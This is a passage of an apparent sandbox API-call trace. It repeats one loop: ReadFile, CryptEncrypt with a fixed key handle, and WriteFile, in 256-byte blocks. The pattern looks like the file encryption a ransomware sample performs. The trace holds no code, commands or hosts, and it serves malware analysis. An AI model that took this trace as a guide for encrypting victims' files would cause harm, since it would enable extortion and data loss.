lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.026] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.026] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.026] GetLastError () returned 0x0 [0173.026] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.026] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.026] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.026] GetLastError () returned 0x0 [0173.026] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.026] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.026] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.026] GetLastError () returned 0x0 [0173.026] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.026] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.026] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.026] GetLastError () returned 0x0 [0173.026] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.026] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.027] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.027] GetLastError () returned 0x0 [0173.027] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.027] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.027] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.027] GetLastError () returned 0x0 [0173.027] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.027] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.027] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.027] GetLastError () returned 0x0 [0173.027] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.027] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.027] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.027] GetLastError () returned 0x0 [0173.027] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.027] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.027] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.027] GetLastError () returned 0x0 [0173.027] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.027] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.027] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.027] GetLastError () returned 0x0 [0173.027] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.027] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.027] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.027] GetLastError () returned 0x0 [0173.027] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.028] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.028] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.028] GetLastError () returned 0x0 [0173.028] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.028] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.028] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.028] GetLastError () returned 0x0 [0173.028] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.028] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.028] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.028] GetLastError () returned 0x0 [0173.028] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.028] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.028] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.028] GetLastError () returned 0x0 [0173.028] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.028] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.028] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.028] GetLastError () returned 0x0 [0173.028] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.028] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.028] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.028] GetLastError () returned 0x0 [0173.028] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.029] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.029] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.029] GetLastError () returned 0x0 [0173.029] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.029] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.029] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.029] GetLastError () returned 0x0 [0173.029] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.029] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.029] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.029] GetLastError () returned 0x0 [0173.029] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.029] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.029] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.029] GetLastError () returned 0x0 [0173.029] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.029] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.029] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.029] GetLastError () returned 0x0 [0173.029] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.029] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.029] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.029] GetLastError () returned 0x0 [0173.029] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.029] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.030] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.030] GetLastError () returned 0x0 [0173.030] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.030] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.030] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.030] GetLastError () returned 0x0 [0173.030] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.030] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.030] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.030] GetLastError () returned 0x0 [0173.030] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.030] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.030] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.030] GetLastError () returned 0x0 [0173.030] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.030] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.030] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.030] GetLastError () returned 0x0 [0173.030] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.030] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.030] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.030] GetLastError () returned 0x0 [0173.030] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.030] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.030] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.031] GetLastError () returned 0x0 [0173.031] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.031] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.031] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.031] GetLastError () returned 0x0 [0173.031] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.031] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, 